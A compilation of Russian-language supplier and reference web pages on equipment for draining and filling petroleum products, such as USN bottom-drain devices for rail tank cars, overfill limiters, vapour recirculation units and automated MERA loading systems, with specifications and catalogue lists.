Слив нефтепродуктов: нижний и верхний налив, устройства слива

Подробнее

  • Кран сифонный крепится на стенке нижнего пояса резервуара через приваренный к ней стальной фланец.
  • Подробнее

  1. ПРУ могут быть выполнены с двумя отводами, расположенными по периферии резервуара в диаметрально противоположных местах и одним отводом в центре резервуара, что обеспечивает размыв донных отложений на максимально возможной площади.
  2. Подробнее

  • с клиновой задвижкой (КС-50К, КС-80К) и с шаровым краном (КС-50, КС-80).
  • Подробнее

Подробнее

Подробнее

Подробнее

Подробнее

Подробнее

Подробнее

Узел сухого разъема (далее по тексту — узел) предназначен для подсоединения технических средств заправки, перекачки, слива-налива нефтепродуктов на автозаправочных станциях и других пунктах хранения нефтепродуктов.

Узел снабжен запирающимися клапанами, предотвращающими утечку перекачиваемой жидкости после размыкания трубопровода при случайном (аварийном) увеличении давления жидкости в трубопроводе.

Узел предназначен для эксплуатации в условиях макроклиматического района с умеренным и холодным климатом.

Подробнее

Узел рециркуляции паров УПР-50 предназначен для герметичности соединения линии рециркуляции резервуарного парка АЗС к автоцистерне. Обеспечивает рециркуляцию паров топлива по замкнутому контуру (без выхода их в окружающее пространство) при сливоналивных операциях на АЗС, АЗК и нефтехранилищах.

Подробнее

Устройство сливное УС-80 используется для слива бензина и дизельного топлива из автоцистерн в резервуары автозаправочных станций (АЗС).
Устройство сливное выпускается двух типоразмеров УС-80А (отвод под углом 90 градусов) и УС-80А-135 (отвод под углом 135 градусов).

Подробнее

Устройства нижнего слива предназначены для слива нефтепродуктов из железнодорожных вагон-цистерн в резервуарные конструкции, передвижные и стационарные. Корпус устройства нижнего слива может быть стальным или алюминиевым в зависимости от требований заказчика.

Подробнее

Клапан обратный ЗКО предназначен для отсекания обратного потока среды при прекращении подачи нефтепродукта в технологическом трубопроводе. Клапан обратный устанавливается на наливных устройствах нефтебаз и АЗС.

Подробнее

Ограничитель налива ОН-80А предназначен для ограничения основного потока топлива во время осуществления операции слива из автоцистерны в резервуар АЗС, при достижении уровня топлива в резервуаре заданной величины.
Клапан отсечной ОК-80А предназначен для перекрытия основного потока топлива во время осуществления операции слива из автоцистерны в резервуар АЗС при достижении уровня в резервуаре заданной величины.

Подробнее

Клапан приемный КП применяется при откачке нефтепродуктов из резервуара в автоцистерну и предназначен для предотвращения слива нефтепродукта из рукава автоцистерны (в обратном направлении) в резервуар при отключении насоса. Клапан приемный КП устанавливается на наконечник рукава автоцистерны.

Подробнее

Источник: http://porshen-hvp.ru/sliv-naliv/

Устройства слива нефтепродуктов УСН, сливоналивные устройства | Устройства слива | Аврора-НЕФТЬ

Главная » Нефтеналивное оборудование » Устройства слива » Устройства слива нефтепродуктов УСН





Опросный лист для заказа оборудования «Устройства слива нефтепродуктов УСН»
Скачать в формате PDF Скачать в формате DOC Запросить цену

Назначение: устройства типа УСН используются для нижнего слива светлых и темных нефтепродуктов (нефти) из железнодорожных цистерн

Описание: в основе конструкции установки лежат шарнирно соединенные трубы, на которых закреплены, с одного конца, присоединительные головки, а с другого — опорные патрубки с присоединительными фланцами. Изделия прочны и долговечны в использовании.

УСН–150, УСН–175 и УСН–200 отличаются своей пропускной способностью светлых и темных нефтепродуктов.

Особенности УСН:

  • Трубы устройства вращаются легко и без перекосов благодаря двухрядным шарнирам обеспечивают легкость вращения вне зависимости от времени эксплуатации.
  • Для замена уплотняющих манжет разборка шарниров не требуется.
  • Захваты можно установить на сливном приборе вагона-цистерны в любом удобном месте, поскольку они поворачиваются относительно присоединительной головки.
  • Сработанные на шарнирах захваты и уплотнение присоединительной головки дает надежную герметичность присоединения устройства даже для перекошенного сливного прибора цистерны.
  • УСН выпускается также с дополнительными опциями:
  • -Устройства УСН с гидромонитором, УСН-Г (в вариациях УСН_150Г, УСН-175Г, УСН-200Г) предназначены для нижнего слива нефтепродуктов из ж/д цистерн, при этом предварительно сливаемый продукт разогревается и размывается.
  • -Устройство представляет собой ту же конструкцию, что и УСН, в оборудование к которой входит телескопический гидромонитор с сопловой головкой и внутренний напорный трубопровод.
     
  • Особенности УСН-Г:
  • В цистерну через внутренний трубопровод под давлением подается аналогичный сливаемому греющий продукт; он динамично перемешивает, разогревает и доводит до жидкого агрегатного состояния вязкий продукт в цистерне.
  • Сопловая головка внутри цистерны поворачивается рукояткой в любом направлении, отчего вязкий продукт интенсивнее перемешивается и разогревается.
  • Устройство УСН-Э (в вариациях УСН-150Э, УСН-175Э, УСН-200Э) с электроподогревом оборудовано электроподогревающей рубашкой, чтобы процесс слива вязких нефтепродуктов происходил быстрее.
     

Особенности УСН-Э:

  • Сопловая головка внутри цистерны поворачивается рукояткой в любом направлении.
  • Система электроподогрева автоматически поддерживает температуру нагрева, дополнительные терморегуляторы к ней не требуются. В роли нагревательного элемента выступает саморегулирующая лента.
  • Устройства УСН с пароподогревом, УСН-П (в вариациях УСН-150П, УСН-175П, УСН-200П) используется для нижнего слива нефтепродуктов; параллельно шарнирные трубы разогреваются паром, что облегчает процесс слива и предотвращает налипание вязких нефтепродуктов на стенки труб.
    Устройство по конструкции совпадает с УСН, в оборудование к которому дополнительно входит подогревающая паровая рубашка.
  • Устройство УСН-ГП обладает достоинствами УСН-Г и УСН-П: оно оборудовано как телескопическим гидромонитором, так и подогревающей рубашкой, для активного процесса слива продукта.
  • Аналогично, устройство УСН-ГЭ объединяет свойства УСН-Г и УСН-Э: для ускорения слива оно оснащено электроподогревающей рубашкой и телескопическим монитором.

№НаименованиеДУ, ммЗона действия, мДополнительная информация1УСН-150-041504Предназначенj для слива нефти и нефтепродуктов из железнодорожных вагонов-цистерн.2УСН-150-0615063УСН-175-0417544УСН-175-0617565УСН-200-0420046УСН-200-0620067УСН-175Г-041754Предназначено для ускоренного нижнего слива вязких нефтепродуктов из железнодорожных вагонов- цистерн, оснащен телескопическим гидромонитром .8УСН-175Г-0617569УСН-200Г-04200410УСН-200Г-06200611УСН-150П-041504 Предназначено для ускоренного нижнего слива вязких нефтепродуктов из железнодорожных вагонов- цистерн, оснащен подогревающей рубашкой.12УСН-150П-06150613УСН-175П-04175414УСН-175П-06175615УСН-200П-04200416УСН-200П-06200617УСН-150Э-041504Предназначено для ускоренного нижнего слива вязких нефтепродуктов из железнодорожных вагонов- цистерн, оснащен электроподогревающей рубашкой18УСН-150Э-06160619УСН-175Э-04175420УСН-175Э-06175621УСН-200Э-04200422УСН-200Э-06200623УСН-175ГП-041754Предназначено для ускоренного нижнего слива вязких нефтепродуктов из железнодорожных вагонов- цистерн, оснащен телескопическим гидромонитором и подогревающей рубашкой24УСН-175ГП-06175625УСН-200ГП-04200426УСН-200ГП-06200627УСН-175ГЭ-041754Предназначено для ускоренного нижнего слива вязких нефтепродуктов из железнодорожных вагонов- цистерн, оснащен телескопическим гидромонитором и электроподогревающей рубашкой28УСН-175ГЭ-06175629УСН-200ГЭ-04200430УСН-200ГЭ-062006

Источник: https://aurora-oil.ru/sku/neftenalivnoe-oborudovanie/ustrojstva-nizhnego-sliva-usn/ustroistva-usn/

Сливно-наливные устройства

СЛИВНО-НАЛИВНЫЕ УСТРОЙСТВА (а. draining and filling in devices; н. Ablauf-und Eingießvorrichtungen; ф. dispositifs de remplissage-vidange; и. instalaciones de vertimiento у relleno) — технические средства для слива и налива нефти, нефтепродуктов, углеводородных, химических и других жидкостей в железнодорожные, автомобильные цистерны и суда. По конструктивному исполнению подразделяются на закрытые (в виде системы трубопроводов, герметичных каналов и герметичной системы подсоединения к ёмкости и цистернам) и открытые (в виде сливных межрельсовых или боковых желобов и лотков, перекрытых съёмными плитами). К первой группе относится в основном принудительный способ слива-налива при помощи насосов, ко второй — самотёчный. Открытый самотёчный слив-налив не нашёл широкого применения в связи с тем, что эта система негерметична и представляет известную пожарную опасность, её используют только для слива мазута и инертных жидкостей. Закрытый самотёчный слив производится через нижний сливной прибор и герметичное сливно-наливное устройство, присоединённое к нему и трубопроводу, подающему продукт в резервуар.

Сливно-наливные устройства по способу выполняемых операций подразделяются на верхние и нижние. Принудительный способ слива-налива через верхнее и нижнее сливно-наливное устройство применим для сливо-наливных операций, как в железнодорожные, так и в автомобильные цистерны. Сливо-наливные операции в танкеры, баржи производят только верхним закрытым способом с помощью стендеров.

Сливно-наливное устройство для верхнего слива-налива нефти и нефтепродуктов в автомобильные и железнодорожные цистерны представляют собой стальной трубный вертикально установленный стояк диаметром до 100 мм (автоцистерны) и 150 мм (железнодорожные цистерны) с резинотканевым или металлическим рукавом с гидроприводным подъёмно-поворотным устройством по типу стендера (рис.); для нижнего слива-налива — из трубной шарнирно-поворотной системы со специальными присоединительными устройствами. Сливно-наливные устройства обычно устанавливаются группами на специальных эстакадах, во избежание перелива цистерн оборудуются ограничителями налива.

Более совершенны сливно-наливные устройства, представляющие собой наливные посты, оснащённые автоматизированными наливными устройствами телескопического типа с производительностью налива до 500-700 т/ч.

Такие сливно-наливные устройства служат для налива цистерн на одном железнодорожном пути, по которому заполненные цистерны заменяются порожними в коротких промежутках между циклами налива.

Эта система налива высокопроизводительна, компактна, наливные операции полностью автоматизированы за счёт применения гидравлических исполнительных механизмов и контрольной аппаратуры; имеется возможность налива одним постом нескольких сортов нефтепродуктов с минимальным их смешением.

Налив цистерн производят группами по 15-20 штат с максимальной массой до 1500-2000 т. Наполнение цистерн производят на весах поочерёдно. Движение цистерн осуществляется с помощью тягового устройства и регулируется с пульта управления. Один пункт налива обычно производит загрузку 18-20 цистерн за 2-2,5 ч.

Операции нижнего налива автомобильных цистерн сводятся к их загрузке через герметично подсоединённое к нижнему патрубку цистерны сливно-наливное устройство, которое оснащается специальными муфтами с гидроприводом для обеспечения скоростей: в начале налива — около 30 м3/ч; полного налива — 120-150 м3/ч, окончания налива — до 15 м /ч. Муфта укомплектовывается электронным устройством, считывающим ёмкости цистерны, подлежащей наливу, с регулированием расхода и контроля опорожнения резервуара автоцистерны при её сливе и другими вспомогательными устройствами, позволяющими обеспечить автоматизированный налив. Имеется также ручное управление.

Работы по совершенствованию сливно-наливного устройства развиваются по пути снижения стоимости операций, максимальному использованию оборудования с целью увеличения пропускной способности пунктов слива-налива, сокращению длительности операций до минимума во избежание простоев цистерн и судов, дальнейшего повышения пожарной безопасности сливо-наливных операций.

Источник: http://www.mining-enc.ru/s/slivno-nalivnye-ustrojstva

Системы слива-налива

Главная MERA Системы слива-налива

Группа компаний «СТЕЛЛА» предлагает автоматизированные системы MERA слива/налива нефтепродуктов, СУГ, обеспечивающие:

  • безопасную работу;
  • высокую производительность отгрузки/приемки продуктов;
  • локальное или распределенное управление оборудованием;
  • учет отпуска / приема продуктов;
  • интеграцию с информационными системами Заказчика.

Предлагаемое решение базируется на основе установок верхнего налива и нижнего слива/налива нефтепродуктов, СУГ собственной разработки с различной степенью автоматизации и функционалом в соответствии с потребностями Заказчика:

  • одновременный налив нескольких цистерн;
  • линия возврата паров с выводом в газоуровнительную линию, систему рекуперации или на свечу рассеивания;
  • противоаварийная защита;
  • резервирование для непрерывной работы;
  • тепловизионный (контроль утечек СУГ) и видеоконтроль;
  • локальное или централизованное управление с рабочего места оператора;
  • учет отгрузки / приема в соответствии с утвержденными МВИ;
  • работа с системами весового контроля;
  • интеграция с информационными системами Заказчика;
  • управление вспомогательными системами (светофоры, шлагбаумы, насосы, освещение и пр.);
  • контроль параметров безопасности (уровни, давление, температуры, заземление, положения рукавов и мостика);
  • контроль загазованности;
  • комплектация насосными агрегатами, узлами подготовки.

Системы MERA слива/налива нефтепродуктов, СУГ обладают основными параметрами:

  • Работа с авто- и ж.д.цистернами, Ду 50-200;
  • На текущий момент реализована система с 50 одновременно загружаемых ж.д. цистерн;
  • Верхний / нижний налив нефтепродуктов и СУГ;
  • Широкий диапазон рабочих давлений сред (0,6-2,0 МПа);
  • Точность отгрузки – не хуже 0,1%;
  • Температурное исполнение реализованных на текущий момент систем – до минус 50°С;
  • Соответствие последним требованиям в области промышленной, экологической и функциональной безопасности;
  • Высокая надежность за счет:
    • использования проверенных технологий,
    • высококачественных комплектующих мировых производителей,
    • применения резервированных средств автоматики и КИП, исполнительных механизмов,
    • применения систем резервированного электроснабжения,
    • широкого использования самодиагностики компонентов систем.
  • Документирование систем в соответствии с отечественными нормативными документами, а также согласно стандартам Заказчика;
  • Поставка «под ключ».

Системы управления разработки группы компаний «СТЕЛЛА» выполняют следующие основные функции:

  • контроль уровня, плотности, температуры, давления и расхода продукта, положения мостиков, рукавов, контроль заземления цистерн и т.д.;
  • осуществление расчетов прямых и косвенных параметров процесса налива в соответствии с нормативными требованиями к отпуску продуктов;
  • обнаружение, сигнализация и регистрация отклонений параметров от установленных границ (скорость налива, расход, положение клапанов);
  • реализация функций локального поста управления — местная индикация состояния работы системы налива (авария, готовность, налив и пр.);
  • формирование и выдача информации о процессе налива, состояния оборудования эстакады на АРМ оператора системы налива;
  • анализ срабатывания блокировок и защит;
  • ведение журналов процесса налива, срабатывания блокировок и защит;
  • связь с вышестоящей системой АСУТП, АСУ;
  • непосредственное регулирование потоков продуктов, обеспечивая необходимую точность измерения расхода / уровня;
  • программно-логическое управление наливом продуктов;
  • получение сигналов задания количества продукта от АРМа оператора системы налива;
  • получение команд управления от АРМа оператора;
  • местное управление процессом налива (подтверждение готовности, авария, пуск, останов и пр.);
  • тестирование и самодиагностика;
  • реконфигурация программного обеспечения;
  • удаленное изменение версий программного обеспечения.
  • RFID контроль и учет (цистерн, персонала).

Также группа компания «СТЕЛЛА» совместно с партнерами ведет разрабтку и имеет опыт успешного применения линейныхреечных приводов штанговых насосов. Использование линейных приводов с возможностью сервопозиционирования позволяет увеличить добычу, вести ее в автоматических режимах при снижении износа скважинного оборудования и стоимости эксплуатации как за счет увеличения КПД, введения рекуперации, так и за счет увеличения межремонтных сроков. В совокупности автоматическая подстройка, частотное регулирование и локальная система управления приводит к увеличению общей надежности привода. Среди Заказчиков уже применяющих с 2001г. решения группы компаний «СТЕЛЛА» можно отметить Норильский никель, Томскгазпром, ТАИФ-НК, СИБУР Тобольск, Ангарская нефтехимическая компания, Киришинефтеоргсинтез, Приморский торговый комплекс (Транснефть), Таманский перегрузочный комплекс, ЛУКОЙЛ-КОМИ.

 

Источник: http://www.ste.ru/mera/systems.html

Устройства слива-налива в железнодорожные цистерны

Описание Технические характеристики Эскизы

   Устройство нижнего слива УСН предназначено для нижнего слива нефти и нефтепродуктов из железнодорожных цистерн.

Устройства УСН используются в нефтяной, нефтехимической отрасли, на нефтебазах, нефтеперерабатывающих заводах и на других объектах, связанных со сливом нефти и нефтепродуктов из железнодорожных вагонов-цистерн.

Герметичный слив (налив) нефтепродуктов из цистерн при помощи УСН обеспечивает снижение вероятности загрязнения наружной поверхности цистерн, эстакады и окружающей территории, а также уменьшение пожароопасности на месте проведения работ.

Конструкция УСН представляет собой надежное и безопасное, легкое в управлении, герметичное устройство. Всему этому способствуют двухрядные усиленные шарниры, обеспечивающие перемещение без перекосов. Шарниры не требуют разборки при замене уплотняющих манжет.

Захваты, которые крепятся к сливной горловине цистерны, могут вращаться вокруг присоединительной головки, за счет чего установку можно монтировать на любом месте сливного прибора. Форма уплотнителя головки герметично соединяется с перекошенным сливным устройством цистерны.

Слив нефтепродукта может производиться и самотеком и с использованием насоса.

Устройство УСН состоит из фундамента, опорного патрубка, шарниров, присоединительной головки с захватами, шарнирно-соединенных труб. Труба с присоединительной головкой  уравновешены компенсатором. Шарниры выполнены из двух обойм, наружной и внутренней, с одним или двумя рядами шариков. Герметичность шарнира обеспечивают уплотнительные манжеты.

Опорный патрубок представляет собой металлоконструкцию из трубы, основания и присоединительного фланца. Основанием установка крепится к фундаменту, а присоединительным фланцем — к фланцу коллектора. Присоединительная головка состоит из непосредственно головки, двух захватов, коромысла и маховика с рукояткой. Захват состоит из стержня и кулачка.

Кулачок находится на верхней части стержня, а нижняя часть стержня крепится к коромыслу. В центральной части коромысла имеется ходовая гайка, которая находится на винте, один конец которого шарнирно закреплен на головке. На втором конце винта установлен маховик.

При вращении маховика вращается винт, а коромысло движется поступательно вверх или вниз в зависимости от направления вращения маховика. Консольная часть установки уравновешивается пружинами.

Принцип работы установки заключается в следующем: головка установки подводится к цистерне, кулачки захватов устанавливаются на борт сливного прибора. Вращением маховика по часовой стрелке головка плотно притягивается к сливному прибору, герметичность присоединения обеспечивает резиновое кольцо, находящееся в конической части головки.

Устройство переносное верхнего слива УПВС предназначено для верхнего слива нефти, нефтепро-дуктов и агрессивных жидкостей из неисправных железнодорожных вагонов-цистерн на нефтеналивных станциях нефтебаз при выходе из строя клапана сливного прибора цистерны.

Установки УПВС оснащены узлом, совместимым с присоединительным устройством установки типа УСН, обеспечивающим герметичное соединение и эксплуатируются совместно. Установки могут эксплуатироваться совместно как с ручным насосом, входящим в комплект поставки установки, так и с вакуумным насосом, входящим в состав насосной станции. Установки в соответствии ГОСТ 27.

003-90, относятся к изделиям многократного циклического применения, восстанавливаемые, обслуживаемые, ремонтируемые.

  • Установки изготавливаются следующих типов:
  • УПВС-80 – установка переносная верхнего слива;
  • УПВС-80Н — установка переносная верхнего слива для агрессивных жидкостей;
  • УПВС-80С – установка переносная верхнего слива стационарная;
  • УПВС-80СН – установка переносная верхнего слива стационарная для агрессивных
  • жидкостей.
  • По устойчивости к воздействию климатических факторов внешней среды устройства УПВС изготавливается в исполнении У и УХЛ.
  • Устройство верхнего налива УНЖ используется для верхнего налива нефтепродуктов и нефти с соблюдением герметичности в железнодорожные цистерны с выводом паров из зоны налива. Пары отводятся через герметичный шарнирный трубопровод, не нуждающийся в замене в течение срока службы устройства
  • Устройства оборудованы автономной автоматической системой прекращения налива, которая:
  • — не требует для работы дополнительных источников энергии;
  • — при достижении продуктом в цистерне уровня, заданного датчиком, автоматически закрывает заслонку. Тем самым устройство прекращает налив и исключает перелив;
  • — обеспечивает закрытие заслонки в режиме «медленно-быстро-медленно», что исключает гидроудар;
  • — при необходимости в любой момент позволяет прекратить налив вручную рукояткой заслонки или втулкой в верхней части датчика уровня.
  • Двухрядные шарниры обеспечивают легкое перемещение устройства без перекосов при длительной эксплуатации.
  • Устройства УНЖ оборудованы телескопической наливной трубой, что дополнительно позволяет применять его на эстакадах, конструкция которых ограничивает подъем наливного устройства по высоте.
  • По устойчивости к воздействию климатических факторов внешней среды устройства УНЖ изготавливается в исполнении У и УХЛ.

 Технические характеристики УСН

Параметры Устройства нижнего слива УСН
Диаметр условного прохода, мм 150 175 200
Рабочая зона обслуживания, м 4 6 4 6 4 6
Условное давление, МПа (кгс/см2) 0,6 (6)
Скорость слива н/продуктов, м/с, не более:
— светлых 5
— темных 9
Расчетная пропускная способность, м3/час, не более:
светлых 320 435 538
темных 570 780 967
Рабочая температура, °С — 45°С + 90°С
Габариты в сложенном положении, мм
— высота 1090 1090 1090 1090 1300 1300
— длина 2300 2800 2300 2800 2300 2800
— ширина 800 800 800 800 600 600
Масса, кг, не более 145 155 190 200 175 190

Технические характеристики УПВС

Параметры УПВС-80 УПВС-80Н УПВС-80С УПВС-80СН
Диаметр условного прохода, мм 80 80 80 80
Рабочее вакуумметрическое давление МПа (кгс/см2) 0,05 (0,5) 0,05 (0,5) 0,05 (0,5) 0,05 (0,5)
Сопротивление заземления между установкой и контуром заземления, Ом, не более 10 10
Диапазон температур окружающей среды, °С
— для климатического исполнения У от -40°Сдо +50°С от -40°Сдо +50°С от -40°Сдо +50°С от -40°Сдо +50°С
— для климатического исполнения ХЛ от -40°Сдо +50°С от -40°Сдо +50°С от -40°Сдо +50°С от -40°Сдо +50°С
Габариты в сложенном положении, мм
— длина 1900 2050 3600 3600
— ширина 250 250 1000 1000
— высота 5000 4850 5300 5300
Вязкость перекачиваемого продукта, сСт, не более 20 20 20 20
Масса, кг, не более 55 115 200 200

Технические характеристики УНЖ

Параметры УНЖ6-100С УНЖ6-100АС-01 УНЖ6-100АС-07
Диаметр условного прохода, мм: 100 100 100
Рабочее давление, МПа (кг/см2), не более: 1,0 (10) 1,0 (10) 1,0 (10)
Расчётная пропускная способность, м3/час 150 150 150
Зона обслуживания, м 6 6 6
Усилие при управлении устройством в пределах рабочей зоны, Н (кгс), не более: 50 (5) 50 (5) 50 (5)
Назначенный срок службы, лет 10 10 10
Обслуживающий персонал, чел 1 1 1
Габаритные размеры в сложенном положении, мм, не более:
— высота 3950 3700 2170
— длина 3700 3700 3380
— ширина 600 600 600
Масса, кг, не более: 180 260 220

Устройства нижнего слива УСН

Устройство переносное верхенго слива УПВС

Устройство верхнего налива УНЖ

Источник: http://promapparat.ru/ustroystva-sliva-naliva-v-zheleznodorozhnyie-tsisternyi/

Узлы учета, устройства слива и налива нефтепродуктов

Каталог оборудования Для резервуаров и сливо-наливных Наливные рукава Налив Узлы учета, устройства слива и налива нефтепродуктов

Устройства верхнего и нижнего слива и налива нефтепродуктов

Запросите цену и срок поставки

№ п/п Наименование оборудования
ОБОРУДОВАНИЕ ПРОИЗВОДСТВА «КОЗ»
1. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150-04 (диаметр условного прохода 150 мм, зона действия 4м)
2. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150-06 (диаметром условного прохода 150 мм, зона действия 6м, стойка гаражного положения)
3. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  без жесткой опоры УСН-150-04 (диаметр условного прохода 150 мм, зона действия 4м)
4. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150П-04 (диаметр условного прохода 150 мм,  зона действия 4м, подогревающая рубашка)
5. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150П-06 (диаметр условного прохода 150 мм,  зона действия 6м, подогревающая рубашка, стойка гаражного положения)
6. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150Э-04 (диаметр условного прохода 150 мм, зона действия 4м, электрический обогрев)
7. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-150Э-06 (диаметр условного прохода 150 мм, зона  действия 6м, электрический обогрев, стойка гаражного положения)
8. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175-04 (диаметр условного прохода 175 мм, зона действия 4м)
9. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175-06 (диаметром условного прохода 175 мм, зона действия 6м, стойка гаражного положения)
10. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  без жесткой опоры  УСН-175-04 (диаметр условного прохода 175 мм, зона действия 4м)
11. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-175П-04 (диаметр условного прохода 175 мм,  зона   действия 4м, подогревающая рубашка)
12. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-175П-06 (диаметр условного прохода 175 мм, зона действия 6м, подогревающая рубашка, стойка гаражного положения)
13. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-175Г-04 (диаметр условного прохода 175 мм, зона действия 4м, гидромонитор)
14. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175Г-06 (диаметр условного прохода 175 мм, зона действия 6м, гидромонитор,  стойка гаражного положения)
15. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175ГП-04 (диаметр условного прохода 175 мм, зона действия 4м, подогревающая рубашка,  гидромонитор)
16. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн   УСН-175ГП-06 (диаметр условного прохода 175 мм, зона действия 6м,  подогревающая рубашка, гидромонитор, стойка гаражного положения)
17. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175Э-04 (диаметр условного прохода 175 мм,  зона действия 4м, электрический обогрев)
18. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-175Э-06 (диаметр условного прохода 175 мм, зона действия 6м, электрический обогрев, стойка гаражного положения)
19. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175ГЭ-04 (диаметр условного прохода 175 мм, зона действия 4м, электрический обогрев, гидромонитор)
20. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-175ГЭ-06 (диаметр условного прохода 175 мм, зона действия 6м, электрический обогрев, гидромонитор, стойка гаражного положения)
21. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн УСН-200-04 (диаметр условного прохода 200 мм, зона действия 4м)
22. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн   УСН-200-06 (диаметр условного прохода 200 мм, зона действия 6м, стойка гаражного положения)
23. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200П-04 (диаметр условного прохода 200 мм, зона действия 4м, подогревающая рубашка)
24. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200П-06 (диаметр условного прохода 200 мм, зона действия 6м, подогревающая рубашка, стойка гаражного положения)
25. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200Г-04 (диаметр условного прохода 200 мм, зона действия 4м, гидромонитор)
26. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн   УСН-200Г-06 (диаметр условного прохода 200 мм, зона действия 6м, гидромонитор, стойка гаражного положения)
27. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200ГП-04 (диаметр условного прохода 200 мм, зона действия 4м, подогревающая рубашка, гидромонитор)
28. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200ГП-06 (диаметр условного прохода 200 мм, зона действия 6м, подогревающая рубашка, гидромонитор, стойка гаражного положения)
29. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-200Э-04 (диаметр условного прохода 200 мм,  зона действия 4м, электрический обогрев)
30. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200Э-06 (диаметр условного прохода 200 мм, зона действия 6м, электрический обогрев, стойка гаражного положения)
31. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн  УСН-200ГЭ-04 (диаметр условного прохода 200 мм, зона действия 4м,  электрический обогрев,  гидромонитор)
32. Устройство  для нижнего слива нефти и нефтепродуктов из железнодорожных  вагонов- цистерн    УСН-200ГЭ-06 (диаметр условного прохода 200 мм, зона действия 6м, электрический обогрев, гидромонитор, стойка гаражного положения)
33.

Источник: https://www.everest-74.ru/shop/vse-dlya-rezervuarov-i-slivo-nalivnyx-estakad/1158/1163/item_1579/

Верхний налив нефтепродуктов

Отпускать нефтепродукты, СУГ, кислоты, щелочи и т.д. нефтебазы и НПЗ должны только через специальные устройства налива нефтепродуктов, СУГ, кислот, щелочей и т.д.

  • в железнодорожные цистерны — на специальных эстакадах, через отдельные стояки верхнего налива нефтепродуктов.
  • в морские и речные суда — через причальные сооружения или беспричальным способом;
  • в автомобильные цистерны — на станциях налива, автоэстакадах, через устройство налива нефтепродуктов;
  • в бочки, бидоны и другую тару — через разливочные и расфасовочные;
  • по отводам от магистральных нефтепродуктопроводов.

Верхний налив нефтепродуктов должен осуществляться по закрытой бесшланговой системе автоматизированных шарнирно-сочлененных или телескопических устройств верхнего налива, оборудованных автоматическими ограничителями налива, обеспечивающими предотвращение перелива цистерн, а также устройствами для герметизации налива с отводом паров на регенерационную установку или газосборную систему.

Верхний Налив нефтепродуктов в железнодорожные и автомобильные цистерны должен производиться под слой жидкости (затопленной струей) без разбрызгивания и всплескивания до установленного уровня наполнения, с учетом возможного расширения от повышения температуры в пути следования. Наливные устройства для налива легковоспламеняющихся и горючих жидкостей должны быть такой длины, чтобы расстояние от конца наливного устройства до нижней образующей цистерны не превышало 200 мм.

  • В зависимости от свойств, климатических условий наливаемого продукта верхним способом в железнодорожные или автомобильные цистерны, существуют различные устройства налива нефтепродуктов:
  • Консоль верхнего налива с контргрузом с телескопической трубой и лебедкой
  • Консоль верхнего не герметичного налива с пружинным балансиром
  • Консоль верхнего не герметичного слива с пружинным балансиром
  • Консоль верхнего не герметичного налива с пружинным балансиром и наливной трубой
  • Консоль верхнего герметичного налива с отводом паров, телескопической трубой, пружинным балансиром
  • Консоль верхнего не герметичного налива с пружинным балансиром и телескопической трубой
  • Консоль верхнего герметичного налива с электрообогревом, с отводом паров, телескопической трубой, пружинным балансиром
  • Консоль верхнего налива с плоской крышкой, отводом паров, телескопической трубой, пружинным балансиром

устройство для верхнего налива нефтепродуктов, СУГ, кислот, щелочей и т.д. в зависимости от химических свойств наливаемого продукта изготавливается из следующих материалов:

  1. -нержавеющая сталь
  2. -сталь 20
  3. -сталь 09Г2С
  4. — футировочный материал внутри стальной трубы.
  5. Применены двухрядные шарниры, обеспечивающие легкое перемещение устройства без перекосов при длительной эксплуатации.
  6. Верхний налив легковоспламеняющихся и горючих жидкостей автоматизируются путем использования ограничителей уровня налива с учетом их применимости для различных сред.
  7. В состав устройства верхнего налива эстакады сжиженных углеводородных газов и легковоспламеняющихся жидкостей, транспортируемых под давлением должны входить:
  8. — трубопровод жидкого продукта (жидкой фазы),
  9. — газоуравнительная линия (трубопровод паровой фазы),
  10. — линия сброса на факел.
  11. На трубопроводах жидкой и паровой фаз при наливе сжиженных углеводородных газов от железнодорожных цистерн до отключающей задвижки должен устанавливаться штуцер с вентилем для удаления остатков газа из рукавов в факельную систему.

